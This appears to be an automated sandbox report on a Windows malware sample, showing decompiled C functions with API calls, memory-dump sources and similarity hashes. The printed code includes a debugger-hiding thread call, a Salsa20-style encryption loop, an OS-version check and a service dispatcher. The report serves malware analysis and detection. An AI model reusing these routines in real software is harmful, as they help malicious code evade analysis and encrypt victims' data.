                                                                                        0x00405d33
                                                                                        0x00405d33
                                                                                        0x00405cf6
                                                                                        0x00405d01
                                                                                        0x00405d09
                                                                                        0x00405d09
                                                                                        0x00405d0c
                                                                                        0x00405d6c
                                                                                        0x00405d71
                                                                                        0x00405d71
                                                                                        0x00405d82

                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNEL32(000000FF,-00000090,00000000,00000000,00000002,?,?,?,?), ref: 00405CEC
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000090,?,00000000,?,?,?,?), ref: 00405D23
                                                                                        • NtClose.NTDLL(000000FF), ref: 00405D71
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: File$ClosePointerRead
                                                                                        • String ID:
                                                                                        • API String ID: 2610616218-0
                                                                                        • Opcode ID: 777679eeb5391a949941078411e3c8d80bb8c7921023074cda048503db83794f
                                                                                        • Instruction ID: e92401d7cf86449c993ab257dce1736fd4b3aade3a58129e992005261cb14f8b
                                                                                        • Opcode Fuzzy Hash: 777679eeb5391a949941078411e3c8d80bb8c7921023074cda048503db83794f
                                                                                        • Instruction Fuzzy Hash: 79F0E936604A44EBEB208B24ED08B6FB7B4EB80B11F20C573D501F15D0D2381A06ED19
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004022D9, Relevance: 3.0, APIs: 2, Instructions: 28nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004022D9(void _a4) {

				 *0x40f94c = _a4;
				 *0x40f94c =  *0x40f94c << 8;
				NtSetInformationProcess(0xffffffff, 0x12, 0x40f94c, 2);
				 *0x40f94c =  *0x40f94c >> 8;
				return NtSetInformationProcess(0xffffffff, 0x21, 0x40f94c, 4);
			}



                                                                                        0x004022e4
                                                                                        0x004022e9
                                                                                        0x004022fb
                                                                                        0x00402301
                                                                                        0x0040231f

                                                                                        APIs
                                                                                        • NtSetInformationProcess.NTDLL(000000FF,00000012,0040F94C,00000002), ref: 004022FB
                                                                                        • NtSetInformationProcess.NTDLL(000000FF,00000021,0040F94C,00000004), ref: 00402313
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InformationProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1801817001-0
                                                                                        • Opcode ID: 233619b2467464f1296a7e77ead386fe23076a04fc59532b68dded45d6556d98
                                                                                        • Instruction ID: 53fea944ceca1c063ec8bef7243d3de7c7776cb26b34a42578b57734461a406d
                                                                                        • Opcode Fuzzy Hash: 233619b2467464f1296a7e77ead386fe23076a04fc59532b68dded45d6556d98
                                                                                        • Instruction Fuzzy Hash: 24E09BB12463047EE1305B49AD0AF527758D360B71F104237F220F14E1D1B124188A79
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404A88, Relevance: 1.6, Strings: 1, Instructions: 337COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 43%
                                                                                        			E00404A88(intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				char _v5;
				char _v84;
				char _v164;
				char _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _t122;
				signed int _t123;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				signed int _t135;
				signed int _t137;
				intOrPtr _t142;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int _t150;
				signed int _t152;
				signed int _t154;
				signed int _t156;
				signed int _t158;
				signed int _t159;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				signed int _t169;
				signed int _t171;
				signed int _t173;
				signed int _t175;
				intOrPtr _t176;
				intOrPtr _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				intOrPtr _t195;
				signed int* _t197;
				signed int _t198;
				intOrPtr _t199;
				signed int _t270;
				signed int _t271;

				_v248 =  &_v84 + 0x0000000f & 0xfffffff0;
				_v252 =  &_v164 + 0x0000000f & 0xfffffff0;
				_t122 =  &_v244 + 0x0000000f & 0xfffffff0;
				_v256 = _t122;
				if(_a16 != 0) {
					asm("xorps xmm0, xmm0");
					asm("movups [esi], xmm0");
					asm("movups [esi+0x10], xmm0");
					asm("movups [esi+0x20], xmm0");
					asm("movups [esi+0x30], xmm0");
					asm("movups xmm0, [esi]");
					asm("movups xmm1, [esi+0x10]");
					asm("movups xmm2, [esi+0x20]");
					asm("movups xmm3, [esi+0x30]");
					asm("movups [edi], xmm0");
					asm("movups [edi+0x10], xmm1");
					asm("movups [edi+0x20], xmm2");
					asm("movups [edi+0x30], xmm3");
					do {
						if(_a16 < 0x40) {
							_v260 = _a12;
							_t194 = _v256;
							_t198 = _t194;
							_t270 = _a8;
							_t176 = _a16;
							do {
								 *((char*)(_t198 + _t176 - 1)) =  *((intOrPtr*)(_t270 + _t176 - 1));
								_t176 = _t176 - 1;
							} while (_t176 != 0);
							_a8 = _t194;
							_a12 = _t194;
						}
						_t197 = _v252;
						asm("movups xmm0, [esi]");
						asm("movups xmm1, [esi+0x10]");
						asm("movups xmm2, [esi+0x20]");
						asm("movups xmm3, [esi+0x30]");
						asm("movups [edi], xmm0");
						asm("movups [edi+0x10], xmm1");
						asm("movups [edi+0x20], xmm2");
						asm("movups [edi+0x30], xmm3");
						_push(_v248);
						do {
							_t123 =  *_t197;
							_t178 = _t197[0xc];
							asm("rol esi, 0x7");
							_t144 = _t197[4] ^ _t123 + _t178;
							asm("rol esi, 0x9");
							_t161 = _t197[8] ^ _t144 + _t123;
							asm("rol esi, 0xd");
							_t179 = _t178 ^ _t161 + _t144;
							asm("rol esi, 0x12");
							 *_t197 = _t123 ^ _t179 + _t161;
							_t197[4] = _t144;
							_t197[8] = _t161;
							_t197[0xc] = _t179;
							_t125 = _t197[5];
							_t180 = _t197[1];
							asm("rol esi, 0x7");
							_t146 = _t197[9] ^ _t125 + _t180;
							asm("rol esi, 0x9");
							_t163 = _t197[0xd] ^ _t146 + _t125;
							asm("rol esi, 0xd");
							_t181 = _t180 ^ _t163 + _t146;
							asm("rol esi, 0x12");
							_t197[5] = _t125 ^ _t181 + _t163;
							_t197[9] = _t146;
							_t197[0xd] = _t163;
							_t197[1] = _t181;
							_t127 = _t197[0xa];
							_t182 = _t197[6];
							asm("rol esi, 0x7");
							_t148 = _t197[0xe] ^ _t127 + _t182;
							asm("rol esi, 0x9");
							_t165 = _t197[2] ^ _t148 + _t127;
							asm("rol esi, 0xd");
							_t183 = _t182 ^ _t165 + _t148;
							asm("rol esi, 0x12");
							_t197[0xa] = _t127 ^ _t183 + _t165;
							_t197[0xe] = _t148;
							_t197[2] = _t165;
							_t197[6] = _t183;
							_t129 = _t197[0xf];
							_t184 = _t197[0xb];
							asm("rol esi, 0x7");
							_t150 = _t197[3] ^ _t129 + _t184;
							asm("rol esi, 0x9");
							_t167 = _t197[7] ^ _t150 + _t129;
							asm("rol esi, 0xd");
							_t185 = _t184 ^ _t167 + _t150;
							asm("rol esi, 0x12");
							_t197[0xf] = _t129 ^ _t185 + _t167;
							_t197[3] = _t150;
							_t197[7] = _t167;
							_t197[0xb] = _t185;
							_t131 =  *_t197;
							_t186 = _t197[3];
							asm("rol esi, 0x7");
							_t152 = _t197[1] ^ _t131 + _t186;
							asm("rol esi, 0x9");
							_t169 = _t197[2] ^ _t152 + _t131;
							asm("rol esi, 0xd");
							_t187 = _t186 ^ _t169 + _t152;
							asm("rol esi, 0x12");
							 *_t197 = _t131 ^ _t187 + _t169;
							_t197[1] = _t152;
							_t197[2] = _t169;
							_t197[3] = _t187;
							_t133 = _t197[5];
							_t188 = _t197[4];
							asm("rol esi, 0x7");
							_t154 = _t197[6] ^ _t133 + _t188;
							asm("rol esi, 0x9");
							_t171 = _t197[7] ^ _t154 + _t133;
							asm("rol esi, 0xd");
							_t189 = _t188 ^ _t171 + _t154;
							asm("rol esi, 0x12");
							_t197[5] = _t133 ^ _t189 + _t171;
							_t197[6] = _t154;
							_t197[7] = _t171;
							_t197[4] = _t189;
							_t135 = _t197[0xa];
							_t190 = _t197[9];
							asm("rol esi, 0x7");
							_t156 = _t197[0xb] ^ _t135 + _t190;
							asm("rol esi, 0x9");
							_t173 = _t197[8] ^ _t156 + _t135;
							asm("rol esi, 0xd");
							_t191 = _t190 ^ _t173 + _t156;
							asm("rol esi, 0x12");
							_t197[0xa] = _t135 ^ _t191 + _t173;
							_t197[0xb] = _t156;
							_t197[8] = _t173;
							_t197[9] = _t191;
							_t137 = _t197[0xf];
							_t192 = _t197[0xe];
							asm("rol esi, 0x7");
							_t158 = _t197[0xc] ^ _t137 + _t192;
							asm("rol esi, 0x9");
							_t175 = _t197[0xd] ^ _t158 + _t137;
							asm("rol esi, 0xd");
							_t193 = _t192 ^ _t175 + _t158;
							asm("rol esi, 0x12");
							_t122 = _t137 ^ _t193 + _t175;
							_t197[0xf] = _t122;
							_t197[0xc] = _t158;
							_t197[0xd] = _t175;
							_t197[0xe] = _t193;
						} while ( &_v5 != 0);
						_pop(_t272);
						asm("movq mm0, [edi]");
						asm("movq mm1, [edi+0x8]");
						asm("movq mm2, [edi+0x10]");
						asm("movq mm3, [edi+0x18]");
						asm("movq mm4, [edi+0x20]");
						asm("movq mm5, [edi+0x28]");
						asm("movq mm6, [edi+0x30]");
						asm("movq mm7, [edi+0x38]");
						asm("paddd mm0, [esi]");
						asm("paddd mm1, [esi+0x8]");
						asm("paddd mm2, [esi+0x10]");
						asm("paddd mm3, [esi+0x18]");
						asm("paddd mm4, [esi+0x20]");
						asm("paddd mm5, [esi+0x28]");
						asm("paddd mm6, [esi+0x30]");
						asm("paddd mm7, [esi+0x38]");
						asm("movq [edi], mm0");
						asm("movq [edi+0x8], mm1");
						asm("movq [edi+0x10], mm2");
						asm("movq [edi+0x18], mm3");
						asm("movq [edi+0x20], mm4");
						asm("movq [edi+0x28], mm5");
						asm("movq [edi+0x30], mm6");
						asm("movq [edi+0x38], mm7");
						asm("movups xmm0, [esi]");
						asm("movups xmm1, [esi+0x10]");
						asm("movups xmm2, [esi+0x20]");
						asm("movups xmm3, [esi+0x30]");
						asm("xorps xmm0, [edi]");
						asm("xorps xmm1, [edi+0x10]");
						asm("xorps xmm2, [edi+0x20]");
						asm("xorps xmm3, [edi+0x30]");
						asm("movups [esi], xmm0");
						asm("movups [esi+0x10], xmm1");
						asm("movups [esi+0x20], xmm2");
						asm("movups [esi+0x30], xmm3");
						_t159 = _v248;
						 *((intOrPtr*)(_t159 + 0x20)) =  *((intOrPtr*)(_t159 + 0x20)) + 1;
						if( *((intOrPtr*)(_t159 + 0x20)) == 0) {
							 *((intOrPtr*)(_t159 + 0x24)) =  *((intOrPtr*)(_t159 + 0x24)) + 1;
						}
						if(_a16 <= 0x40 && _a16 < 0x40) {
							_t177 = _a16;
							_t271 = _a12;
							_t199 = _v260;
							do {
								 *((char*)(_t199 + _t177 - 1)) =  *((intOrPtr*)(_t271 + _t177 - 1));
								_t177 = _t177 - 1;
							} while (_t177 != 0);
							_t195 = _a4;
							 *((intOrPtr*)(_t195 + 0x20)) =  *((intOrPtr*)(_t159 + 0x20));
							_t142 =  *((intOrPtr*)(_t159 + 0x24));
							 *((intOrPtr*)(_t195 + 0x24)) = _t142;
							return _t142;
						}
						_a12 = _a12 + 0x40;
						_a8 = _a8 + 0x40;
						_a16 = _a16 - 0x40;
					} while (_a16 != 0);
				}
				return _t122;
			}































































                                                                                        0x00404a9f
                                                                                        0x00404ab1
                                                                                        0x00404ac0
                                                                                        0x00404ac3
                                                                                        0x00404acd
                                                                                        0x00404ad9
                                                                                        0x00404adc
                                                                                        0x00404adf
                                                                                        0x00404ae3
                                                                                        0x00404ae7
                                                                                        0x00404af4
                                                                                        0x00404af7
                                                                                        0x00404afb
                                                                                        0x00404aff
                                                                                        0x00404b03
                                                                                        0x00404b06
                                                                                        0x00404b0a
                                                                                        0x00404b0e
                                                                                        0x00404b12
                                                                                        0x00404b16
                                                                                        0x00404b1b
                                                                                        0x00404b21
                                                                                        0x00404b27
                                                                                        0x00404b29
                                                                                        0x00404b2c
                                                                                        0x00404b2f
                                                                                        0x00404b33
                                                                                        0x00404b37
                                                                                        0x00404b38
                                                                                        0x00404b3c
                                                                                        0x00404b3f
                                                                                        0x00404b3f
                                                                                        0x00404b48
                                                                                        0x00404b4e
                                                                                        0x00404b51
                                                                                        0x00404b55
                                                                                        0x00404b59
                                                                                        0x00404b5d
                                                                                        0x00404b60
                                                                                        0x00404b64
                                                                                        0x00404b68
                                                                                        0x00404b6d
                                                                                        0x00404b73
                                                                                        0x00404b73
                                                                                        0x00404b7b
                                                                                        0x00404b82
                                                                                        0x00404b85
                                                                                        0x00404b8b
                                                                                        0x00404b8e
                                                                                        0x00404b94
                                                                                        0x00404b97
                                                                                        0x00404b9d
                                                                                        0x00404ba2
                                                                                        0x00404ba4
                                                                                        0x00404ba7
                                                                                        0x00404baa
                                                                                        0x00404bad
                                                                                        0x00404bb6
                                                                                        0x00404bbd
                                                                                        0x00404bc0
                                                                                        0x00404bc6
                                                                                        0x00404bc9
                                                                                        0x00404bcf
                                                                                        0x00404bd2
                                                                                        0x00404bd8
                                                                                        0x00404bdd
                                                                                        0x00404be0
                                                                                        0x00404be3
                                                                                        0x00404be6
                                                                                        0x00404be9
                                                                                        0x00404bf2
                                                                                        0x00404bf9
                                                                                        0x00404bfc
                                                                                        0x00404c02
                                                                                        0x00404c05
                                                                                        0x00404c0b
                                                                                        0x00404c0e
                                                                                        0x00404c14
                                                                                        0x00404c19
                                                                                        0x00404c1c
                                                                                        0x00404c1f
                                                                                        0x00404c22
                                                                                        0x00404c25
                                                                                        0x00404c2e
                                                                                        0x00404c35
                                                                                        0x00404c38
                                                                                        0x00404c3e
                                                                                        0x00404c41
                                                                                        0x00404c47
                                                                                        0x00404c4a
                                                                                        0x00404c50
                                                                                        0x00404c55
                                                                                        0x00404c58
                                                                                        0x00404c5b
                                                                                        0x00404c5e
                                                                                        0x00404c61
                                                                                        0x00404c69
                                                                                        0x00404c70
                                                                                        0x00404c73
                                                                                        0x00404c79
                                                                                        0x00404c7c
                                                                                        0x00404c82
                                                                                        0x00404c85
                                                                                        0x00404c8b
                                                                                        0x00404c90
                                                                                        0x00404c92
                                                                                        0x00404c95
                                                                                        0x00404c98
                                                                                        0x00404c9b
                                                                                        0x00404ca4
                                                                                        0x00404cab
                                                                                        0x00404cae
                                                                                        0x00404cb4
                                                                                        0x00404cb7
                                                                                        0x00404cbd
                                                                                        0x00404cc0
                                                                                        0x00404cc6
                                                                                        0x00404ccb
                                                                                        0x00404cce
                                                                                        0x00404cd1
                                                                                        0x00404cd4
                                                                                        0x00404cd7
                                                                                        0x00404ce0
                                                                                        0x00404ce7
                                                                                        0x00404cea
                                                                                        0x00404cf0
                                                                                        0x00404cf3
                                                                                        0x00404cf9
                                                                                        0x00404cfc
                                                                                        0x00404d02
                                                                                        0x00404d07
                                                                                        0x00404d0a
                                                                                        0x00404d0d
                                                                                        0x00404d10
                                                                                        0x00404d13
                                                                                        0x00404d1c
                                                                                        0x00404d23
                                                                                        0x00404d26
                                                                                        0x00404d2c
                                                                                        0x00404d2f
                                                                                        0x00404d35
                                                                                        0x00404d38
                                                                                        0x00404d3e
                                                                                        0x00404d41
                                                                                        0x00404d43
                                                                                        0x00404d46
                                                                                        0x00404d49
                                                                                        0x00404d4c
                                                                                        0x00404d50
                                                                                        0x00404d59
                                                                                        0x00404d5a
                                                                                        0x00404d5d
                                                                                        0x00404d61
                                                                                        0x00404d65
                                                                                        0x00404d69
                                                                                        0x00404d6d
                                                                                        0x00404d71
                                                                                        0x00404d75
                                                                                        0x00404d79
                                                                                        0x00404d7c
                                                                                        0x00404d80
                                                                                        0x00404d84
                                                                                        0x00404d88
                                                                                        0x00404d8c
                                                                                        0x00404d90
                                                                                        0x00404d94
                                                                                        0x00404d98
                                                                                        0x00404d9b
                                                                                        0x00404d9f
                                                                                        0x00404da3
                                                                                        0x00404da7
                                                                                        0x00404dab
                                                                                        0x00404daf
                                                                                        0x00404db3
                                                                                        0x00404dba
                                                                                        0x00404dbd
                                                                                        0x00404dc1
                                                                                        0x00404dc5
                                                                                        0x00404dc9
                                                                                        0x00404dcc
                                                                                        0x00404dd0
                                                                                        0x00404dd4
                                                                                        0x00404ddb
                                                                                        0x00404dde
                                                                                        0x00404de2
                                                                                        0x00404de6
                                                                                        0x00404dea
                                                                                        0x00404df0
                                                                                        0x00404df7
                                                                                        0x00404df9
                                                                                        0x00404df9
                                                                                        0x00404e00
                                                                                        0x00404e08
                                                                                        0x00404e0b
                                                                                        0x00404e0e
                                                                                        0x00404e14
                                                                                        0x00404e18
                                                                                        0x00404e1c
                                                                                        0x00404e1d
                                                                                        0x00404e21
                                                                                        0x00404e27
                                                                                        0x00404e2a
                                                                                        0x00404e2d
                                                                                        0x00000000
                                                                                        0x00404e2d
                                                                                        0x00404e32
                                                                                        0x00404e36
                                                                                        0x00404e3a
                                                                                        0x00404e3e
                                                                                        0x00404b12
                                                                                        0x00404e50

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: 18ad636fd247c377b08161490afa645b743f930d5ea7395dcc324908aaa8e533
                                                                                        • Instruction ID: 98e5c8fefd599ba26b3d4eaaa51e376bdd4639789aa86b62e4b501e9ffc4074c
                                                                                        • Opcode Fuzzy Hash: 18ad636fd247c377b08161490afa645b743f930d5ea7395dcc324908aaa8e533
                                                                                        • Instruction Fuzzy Hash: 90E13872D14F6A9BC764CF29C580591F3E0BF98220B06976ADC5CA3B01E775BDA18BC0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402FB6, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00402FB6(void* _a4, signed int* _a8) {
				void _v8;
				void* _t12;

				_t12 = 0;
				if(NtQueryInformationProcess(_a4, 0x1a,  &_v8, 4, 0) == 0) {
					 *_a8 = 0 | _v8 != 0x00000000;
					_t12 = 1;
				}
				return _t12;
			}





                                                                                        0x00402fc1
                                                                                        0x00402fd8
                                                                                        0x00402fe5
                                                                                        0x00402fe7
                                                                                        0x00402fe7
                                                                                        0x00402ff2

                                                                                        APIs
                                                                                        • NtQueryInformationProcess.NTDLL(?,0000001A,00000000,00000004,00000000), ref: 00402FD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InformationProcessQuery
                                                                                        • String ID:
                                                                                        • API String ID: 1778838933-0
                                                                                        • Opcode ID: d0c14a1113ac1fa2f6ae82ecee67b9fe3360c3d6be6988a0e40692ee0bd9bf95
                                                                                        • Instruction ID: 197e88fdda0d752d7a5c877a72fac8a44d184f2e754f7594785d1e43604a380d
                                                                                        • Opcode Fuzzy Hash: d0c14a1113ac1fa2f6ae82ecee67b9fe3360c3d6be6988a0e40692ee0bd9bf95
                                                                                        • Instruction Fuzzy Hash: 88E0E572305208BEE7109E659C45EBBB76CE741761F10423ABA04D21E0E6715E0492A4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401B60, Relevance: 1.5, APIs: 1, Instructions: 28nativethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00401B60() {
				void _v8;
				void* _t7;

				_t7 = 0;
				_v8 = _v8 & 0x00000000;
				if(NtSetInformationThread(0xfffffffe, 5,  &_v8, 4) == 0) {
					_t7 = 1;
				}
				return _t7;
			}





                                                                                        0x00401b6b
                                                                                        0x00401b6d
                                                                                        0x00401b83
                                                                                        0x00401b85
                                                                                        0x00401b85
                                                                                        0x00401b90

                                                                                        APIs
                                                                                        • NtSetInformationThread.NTDLL(000000FE,00000005,00000000,00000004), ref: 00401B7B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InformationThread
                                                                                        • String ID:
                                                                                        • API String ID: 4046476035-0
                                                                                        • Opcode ID: 91af158a7b54514cc4fee008624f9b00fa99d19da9d83385013b2b4622dc768c
                                                                                        • Instruction ID: 06f78e9d7ce7a3ca4b9b31d5ca4f30c4bf89a7ff421c92d978add4f1999fd1f6
                                                                                        • Opcode Fuzzy Hash: 91af158a7b54514cc4fee008624f9b00fa99d19da9d83385013b2b4622dc768c
                                                                                        • Instruction Fuzzy Hash: A4E086B27092087EF710999A6C8AFB7B36CE781735F20437ABA24D11D0F6615E0881B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004054BB, Relevance: 1.5, APIs: 1, Instructions: 14filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004054BB(void** _a4) {
				void* _v12;

				return NtQueryInformationFile( *_a4,  &_v12, _a4[1], 0x10000, 9);
			}




                                                                                        0x004054dd

                                                                                        APIs
                                                                                        • NtQueryInformationFile.NTDLL(?,?,?,00010000,00000009), ref: 004054D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FileInformationQuery
                                                                                        • String ID:
                                                                                        • API String ID: 365787318-0
                                                                                        • Opcode ID: ce70c837223e219a87301e68f4524c228a14abbf4ddf43573a1731b69de89d49
                                                                                        • Instruction ID: d76f3af99f29cea25a8bce4ee3973846b9aecf6d6ebf6b866eef9585fa867104
                                                                                        • Opcode Fuzzy Hash: ce70c837223e219a87301e68f4524c228a14abbf4ddf43573a1731b69de89d49
                                                                                        • Instruction Fuzzy Hash: 4CD0A73510010C7BC7208A50CC05EA57B28D705314F104275BE145A1F0E6735561D7C9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402A1F, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00402A1F(struct _SERVICE_TABLE_ENTRY _a4) {

				 *0x40f95c = _a4;
				 *0x40f960 = E004027BC;
				return StartServiceCtrlDispatcherW(0x40f95c);
			}



                                                                                        0x00402a25
                                                                                        0x00402a30
                                                                                        0x00402a41

                                                                                        APIs
                                                                                        • StartServiceCtrlDispatcherW.ADVAPI32(0040F95C,?,00409287,.2c9ccbf3,.2c9ccbf3), ref: 00402A3A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CtrlDispatcherServiceStart
                                                                                        • String ID:
                                                                                        • API String ID: 3789849863-0
                                                                                        • Opcode ID: f9c489ca971324dc97495b56aa2b73a5cf452d7b72d33e38d02a823237883c95
                                                                                        • Instruction ID: 8fcf9c9fc0ed8821340c37450363af474460318d29d11ca68bed58065611c5a6
                                                                                        • Opcode Fuzzy Hash: f9c489ca971324dc97495b56aa2b73a5cf452d7b72d33e38d02a823237883c95
                                                                                        • Instruction Fuzzy Hash: 94D012B5000308AFC311EF64EA44A917BE8E304B00300C137EC00E3A60D7707408CF5C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004016D2, Relevance: .1, Instructions: 85COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004016D2() {
				intOrPtr _t3;
				intOrPtr _t14;
				intOrPtr _t15;

				_t3 =  *[fs:0x30];
				_t15 =  *((intOrPtr*)(_t3 + 0xa4));
				_t14 =  *((intOrPtr*)(_t3 + 0xa8));
				if(_t15 != 5 || _t14 >= 1) {
					if(_t15 >= 5) {
						if(_t15 != 5 || _t14 != 1) {
							if(_t15 != 5 || _t14 != 2) {
								if(_t15 != 6 || _t14 != 0) {
									if(_t15 != 6 || _t14 != 1) {
										if(_t15 != 6 || _t14 != 2) {
											if(_t15 != 6 || _t14 != 3) {
												if(_t15 != 0xa || _t14 != 0) {
													if(_t15 != 0xa || _t14 <= 0) {
														if(_t15 <= 0xa) {
															return 0xffffffff;
														} else {
															goto L28;
														}
													} else {
														L28:
														return 0x7fffffff;
													}
												} else {
													return 0x64;
												}
											} else {
												return 0x3f;
											}
										} else {
											return 0x3e;
										}
									} else {
										return 0x3d;
									}
								} else {
									return 0x3c;
								}
							} else {
								return 0x34;
							}
						} else {
							return 0x33;
						}
					} else {
						goto L3;
					}
				} else {
					L3:
					return 0;
				}
			}






                                                                                        0x004016d4
                                                                                        0x004016da
                                                                                        0x004016e0
                                                                                        0x004016e9
                                                                                        0x004016f3
                                                                                        0x00401705
                                                                                        0x0040171c
                                                                                        0x00401730
                                                                                        0x00401743
                                                                                        0x00401757
                                                                                        0x0040176b
                                                                                        0x0040177f
                                                                                        0x00401792
                                                                                        0x0040179c
                                                                                        0x004017ad
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040179e
                                                                                        0x0040179e
                                                                                        0x004017a5
                                                                                        0x004017a5
                                                                                        0x00401785
                                                                                        0x0040178c
                                                                                        0x0040178c
                                                                                        0x00401772
                                                                                        0x00401779
                                                                                        0x00401779
                                                                                        0x0040175e
                                                                                        0x00401765
                                                                                        0x00401765
                                                                                        0x0040174a
                                                                                        0x00401751
                                                                                        0x00401751
                                                                                        0x00401736
                                                                                        0x0040173d
                                                                                        0x0040173d
                                                                                        0x00401723
                                                                                        0x0040172a
                                                                                        0x0040172a
                                                                                        0x0040170c
                                                                                        0x00401713
